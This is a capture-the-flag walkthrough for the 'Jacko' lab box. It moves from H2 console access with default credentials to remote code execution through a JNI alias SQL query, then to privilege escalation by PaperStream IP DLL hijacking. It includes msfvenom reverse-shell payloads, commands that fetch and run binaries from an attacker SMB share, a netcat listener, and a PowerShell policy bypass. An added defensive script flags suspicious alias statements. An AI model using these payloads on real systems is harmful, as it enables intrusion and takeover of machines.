
PG - Jacko | Exploitation notes

Enumeration

Nmap Scan

```
$ nmap $ip -sVC -oN nmapInitial.txt -Pn
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8082/tcp open  http          H2 database http console
|_http-title: H2 Console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Port 8082: log in to the H2 console using the default credentials sa:<blank>

Initial Exploitation

This version of H2 is vulnerable to remote code execution via JNI.

Create the payload using msfvenom and get a shell by executing the following SQL query:

```sql
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.106/share/shell.exe").getInputStream()).useDelimiter("\\Z").next()');
```

```
$ nc -nvlp 8082
listening on [any] 8082 ...
connect to [192.168.49.106] from (UNKNOWN) [192.168.106.66] 50530
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>
```
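The CREATE ALIAS / CALL pair above is the whole primitive: H2 lets a database user bind a SQL function name to a Java static method (or to inline Java source) and then call it. The following is an added defensive example, not part of the original notes, showing how a reviewer could scan captured H2 console statements (one statement per line, as assumed here; the sample statements are constructed) for aliases that expose Java code and for calls to them that carry process-execution arguments:

```python
"""Review H2 SQL statements for aliases that expose Java code (added example)."""
import re
from dataclasses import dataclass

# CREATE ALIAS <name> FOR "<class>.<method>": binds a SQL function to a Java static method.
ALIAS_FOR = re.compile(
    r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(?P<alias>\w+)\s+FOR\s+"(?P<target>[^"]+)"',
    re.IGNORECASE,
)
# CREATE ALIAS <name> AS $$ ... $$: the function body is inline Java source compiled by H2.
ALIAS_SOURCE = re.compile(
    r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(?P<alias>\w+)\s+AS\s+\$\$',
    re.IGNORECASE,
)
# CALL <name>(...): invocation of a user-defined function.
CALL = re.compile(r'\bCALL\s+(?P<alias>\w+)\s*\(', re.IGNORECASE)
# Argument substrings that indicate process or shell execution (constructed watch list).
SUSPICIOUS_ARGS = ("java.lang.Runtime", "ProcessBuilder", "cmd.exe", "powershell", "/bin/sh")


@dataclass
class Finding:
    line_no: int
    severity: str
    reason: str
    statement: str


def review_statements(lines):
    """Return one Finding per statement that creates or invokes a Java-backed alias."""
    findings = []
    aliases = {}  # lowercase alias name -> what it is bound to
    for n, raw in enumerate(lines, 1):
        stmt = raw.strip()
        if not stmt:
            continue
        m = ALIAS_FOR.search(stmt)
        if m:
            aliases[m["alias"].lower()] = m["target"]
            findings.append(Finding(n, "high",
                                    f"alias {m['alias']} bound to Java method {m['target']}", stmt))
            continue
        m = ALIAS_SOURCE.search(stmt)
        if m:
            aliases[m["alias"].lower()] = "<inline Java source>"
            findings.append(Finding(n, "high",
                                    f"alias {m['alias']} defined from inline Java source", stmt))
            continue
        m = CALL.search(stmt)
        if m and m["alias"].lower() in aliases:
            hits = [s for s in SUSPICIOUS_ARGS if s.lower() in stmt.lower()]
            severity = "critical" if hits else "high"
            reason = f"call to Java-backed alias {m['alias']}"
            if hits:
                reason += " with execution indicators: " + ", ".join(hits)
            findings.append(Finding(n, severity, reason, stmt))
    return findings


# Constructed sample: two benign statements, one alias-to-method, one call, one inline-source alias.
SAMPLE_STATEMENTS = [
    "SELECT * FROM INFORMATION_SCHEMA.TABLES;",
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
    "CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime()"
    ".exec(\"cmd.exe /c whoami\").getInputStream()).useDelimiter(\"\\\\Z\").next()');",
    "CALL HASH('SHA256', STRINGTOUTF8('x'));",
    "CREATE ALIAS SHOW_DATE AS $$ String d() { return java.time.LocalDate.now().toString(); } $$;",
]

if __name__ == "__main__":
    for f in review_statements(SAMPLE_STATEMENTS):
        print(f"line {f.line_no} [{f.severity}] {f.reason}")
```

The alias table is built in statement order, so a CALL is only flagged when the name was earlier bound to Java code; a CALL to a built-in such as HASH produces nothing. The mitigation that makes this log review unnecessary is the usual one for this box: no console exposed on the network, and no blank password on sa.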

Fix path variable

```
C:\Program Files (x86)\H2\service>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files (x86)\H2\service>set PATH=%SystemRoot%\system32;%SystemRoot%;

C:\Program Files (x86)\H2\service>whoami
jacko\tony
```

Privilege Escalation

Enumerate installed programs with dir "C:\Program Files (x86)".

The installed version of PaperStream IP is vulnerable to DLL hijacking.

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.106 LPORT=445 -f dll -o UninOldIS.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 8704 bytes
Saved as: UninOldIS.dll
```
Note: edit the path in the script to $PayloadFile = "C:\Users\tony\Desktop\UninOldIS.dll" if the DLL file in c:\windows\temp is being deleted by AV.

```
C:\Users\tony\Desktop>copy \\192.168.49.106\share\exploit.ps1 exploit.ps1
copy \\192.168.49.106\share\exploit.ps1 exploit.ps1
        1 file(s) copied.

C:\Users\tony\Desktop>copy \\192.168.49.106\share\UninOldIS.dll UninOldIS.dll
copy \\192.168.49.106\share\UninOldIS.dll UninOldIS.dll
        1 file(s) copied.

C:\Users\tony\Desktop>C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
```